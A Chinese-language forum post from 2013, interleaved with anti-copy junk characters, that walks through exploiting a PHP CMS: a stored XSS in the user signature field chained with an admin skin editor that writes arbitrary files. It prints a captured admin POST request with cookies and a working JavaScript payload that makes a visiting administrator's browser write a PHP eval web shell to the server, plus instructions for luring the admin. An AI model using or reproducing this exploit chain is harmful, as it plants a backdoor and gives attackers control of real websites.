|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
7 n; D% ^, i% s1 L6 G# z官网已经修补了,所以重新下了源码5 d6 d U3 ^* d& C; Y3 v
因为 后台登入 还需要认证码 所以 注入就没看了。+ L: W, W) a+ ~3 `/ f0 q4 z
存在 xss
5 e7 ?$ f3 v( E漏洞文件 user/member/skin_edit.php
3 V2 U2 a% U* G2 I本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:/ b2 b* B+ z* r: K5 F# k. I
3 ~7 {: n& F0 E/ i0 T</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>8 X; T+ ?% g8 E( N$ Z% X4 M: m$ }4 c
; i8 Y$ E& @' v6 [# g# F: v' D; b</textarea></td></tr>( ^. ^. w9 l" n/ u& E
+ i) x1 ^9 @" {) P user/do.php
+ D$ t9 i. X4 Q% x- ^7 u1 C+ z+ ]. ]& P2 V2 L {
3 B s' i- s wif($op=='zl'){ //资料
7 p( k/ A0 C3 `. w) `& n- a! d5 V- W - z/ R+ y& A' n: [# K, J1 e
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
" w% Z1 Q, f! b3 m. _ exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));7 I" b' M7 v5 Q5 O1 q5 d* M. `
# g) f; q0 G# m9 n $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',2 W( V% o$ |8 q' T& D8 {
7 v( d1 {) W. Y+ d
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'' P2 m9 c6 G9 Q: e- g1 d
where CS_Name='".$cscms_name."'";+ y# R, m8 `, N) k
A' Q5 |1 q) Z$ J. t4 t# B- b2 P" O
if($db->query($sql)){
1 q9 K% ^# R) e% b4 L
: ?2 I4 R2 n2 T+ f' w% ^. y exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));) U2 p" y/ B) _- V4 `
# B8 p7 ` K! I
}else{9 X# G* [" f( `3 j
6 C6 v1 {1 U) \, k3 U$ Z+ v/ ?
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);')); D$ M+ n; D' H
% g$ g* O8 x2 h. I- O% H }* s3 ~2 o0 B. S6 [6 {) U( j
8 H) N5 y6 w) ?6 n! P: f- B
8 W5 ^- ?/ c$ q6 s- V7 q8 { r# k没有 过滤导致xss产生。. Y3 q. E! |" m6 H5 f p( n1 x6 Y
后台 看了下 很奇葩的是可以写任意格式文件。。0 [" Q% [7 v- @8 M% b: D2 E' J
抓包。。
& B3 V, X( f4 B% `% {- \
7 I7 o" ~5 [2 h) R
3 e# Q$ }/ l) n7 ]. B# ~5 P本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1. i2 p( e3 }7 ~2 V" s$ \- y: v, T
4 j3 s1 ?9 [8 _Accept: text/html, application/xhtml+xml, */*, X T) _! x! I( ~* {
, L$ {/ J% [1 z; XReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
+ \# t. d7 v( ?# X # t( m5 y* F4 d2 f6 {
Accept-Language: zh-CN( u m P4 {" }' n) k
& _" ]0 L, M6 k4 _4 p- U* }' R; U& MUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
' M, U1 W% w: g0 L7 b8 v( l/ C
% G# _7 |3 a" c+ D& e& B6 ~Content-Type: application/x-www-form-urlencoded
6 z/ B1 t: |" K3 j! v8 B 8 Y& G2 K' d6 ]6 ?) G- f
Accept-Encoding: gzip, deflate1 H0 z, f6 R+ n9 T
( i5 c7 v' v! D$ D; KHost: 127.0.0.1
8 O% c9 Y8 b0 V" M. ^ / v1 z# ]5 o0 c$ S7 W6 v
Content-Length: 38
- B0 ?0 q- d. c/ @4 A0 J % _" R. \- x4 {; A; }' U3 K, N+ H
DNT: 13 F3 j: _4 r7 e
+ a, R" F- S* D/ j zConnection: Keep-Alive5 r% y" z: O* ^$ C" D1 x! K
. r H/ p9 {. l& h& c, A+ i
Cache-Control: no-cache% ]. f- u: V% W* T
9 W' o. d+ f0 F
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655947 z8 P+ V, m0 a: C$ o& ]4 }
& m/ h6 Q, \) W
E" v+ f3 Y3 e5 ^) l2 _name=aaa.php&content=%3Cs%3E%3Ca%25%3E
; _/ Z6 r6 \4 o6 _' u7 R- {- Z( O) y, c
- U- M( f4 P, c9 ^: l2 \$ j" N6 `$ Q% }& |% k
于是 构造js如下。+ x; k3 T8 I% y& g
# y2 f7 @1 [2 Y: f9 s2 I本帖隐藏的内容<script>
' S; |8 ]" B( q# [+ y( O6 U2 HthisTHost = top.location.hostname;
( n1 K* d3 |; C/ M0 e3 O
5 ~1 J9 G& a- M7 HthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
) A" ^, I2 W0 C; i* J% C: n
8 a+ f2 X/ g! I) B" u( Efunction PostSubmit(url, data, msg) { 8 h+ t- u, M! V
var postUrl = url;
Q/ ~0 d& ?; L* ]9 _ @, y A4 W* d ; x; k5 n! @- v9 j# E" g
var postData = data; 2 H( T8 B, Q8 _" ?9 h% U2 R
var msgData = msg; 9 h$ O# ~1 T+ W0 x2 l
var ExportForm = document.createElement("FORM"); 7 D0 f( r4 Y& {' P3 ^) {( J7 U
document.body.appendChild(ExportForm);
0 ]; M- I9 q |$ K# q9 M4 @* \; L) \0 J ExportForm.method = "POST";
/ u$ ~% A; w7 ?0 X! z var newElement = document.createElement("input"); 5 l6 e. P# f3 h3 B% |) W' m
newElement.setAttribute("name", "name");
( o4 O$ F$ V8 g newElement.setAttribute("type", "hidden");
1 \( S- g! ?3 Y7 q( ]' j var newElement2 = document.createElement("input");
' s6 G! f: }2 [7 e- C newElement2.setAttribute("name", "content");
) @$ M# u1 n5 H7 `; p( g newElement2.setAttribute("type", "hidden");
; ]' O2 D' C+ }) G0 ? ExportForm.appendChild(newElement);
( @+ Q2 A7 a9 m" p' V ExportForm.appendChild(newElement2); . u$ ] W/ C4 d$ }# v
newElement.value = postData;
7 B2 x0 _- d" R7 H1 c% Y newElement2.value = msgData;
5 }' F0 z |5 S ExportForm.action = postUrl; - I/ {% x' `# ]1 G
ExportForm.submit();
3 N4 P W' ~8 Q" f};# o6 m! A1 j$ O% ~
: x3 g( G* `4 {2 t( e. c4 i" ] dPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
7 L7 s* v# c; j
0 ~1 p; W8 D I7 s J& o</script>' U8 ]* Z' o9 g5 R9 I
; @- D( Z% `! p y
8 v0 U" d) {$ ~1 q4 ]0 R
1 V& ?8 @) h8 j; lhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入/ d% x; h/ y% h" Q; Y% E& M
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)* i+ A _8 i$ L/ i& Q
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
+ T2 S, r& C( @; w |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对